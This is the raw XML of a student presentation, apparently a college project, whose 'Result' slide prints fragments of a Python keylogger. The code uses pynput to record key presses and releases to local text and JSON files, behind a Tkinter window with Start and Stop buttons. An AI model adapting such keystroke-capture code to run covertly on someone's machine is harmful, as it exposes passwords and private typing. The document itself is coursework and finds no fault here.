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2" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="198" y="11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09-04-2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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4/9/2024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altLang="en-US" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>KINGS ENGINEERING COLLEGE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>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a:xfrm>
            <a:off x="581192" y="729866"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048606" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346454" y="-7654081"/>
            <a:ext cx="4880610" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048607" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135374" y="1260162"/>
            <a:ext cx="2956335" cy="5120640"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>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tk</a:t>
            </a:r>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import *</a:t>
            </a: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pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>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json</a:t>
            </a:r>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 []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys =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generate_text_log</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with open('key_log.txt', "w+") as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keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key)</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with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>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wb</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key_log</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</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).encode()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key_log.write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on_press</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if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{'Pressed':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flag = True</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{'Held':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on_release</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{'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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
        <p:nvSpPr>
          <p:cNvPr id="1048608" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409665" y="1348800"/>
            <a:ext cx="2956335" cy="3749040"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>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keys = keys + str(key)</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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</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listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</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listener.start</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(text="Keylogger stopped.")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root = Tk()</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root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")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(anchor=CENTER)</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label.pack</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text="Start", command=</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start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)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text="Stop", command=</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 state='disabled')</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stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)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root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</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root.mainloop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kings engineering college</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-24T20:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-23T09:27:44Z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5c0b17812ea04bab8c2b6e457285e4d9</vt:lpwstr>
  </property>
</Properties>
</file>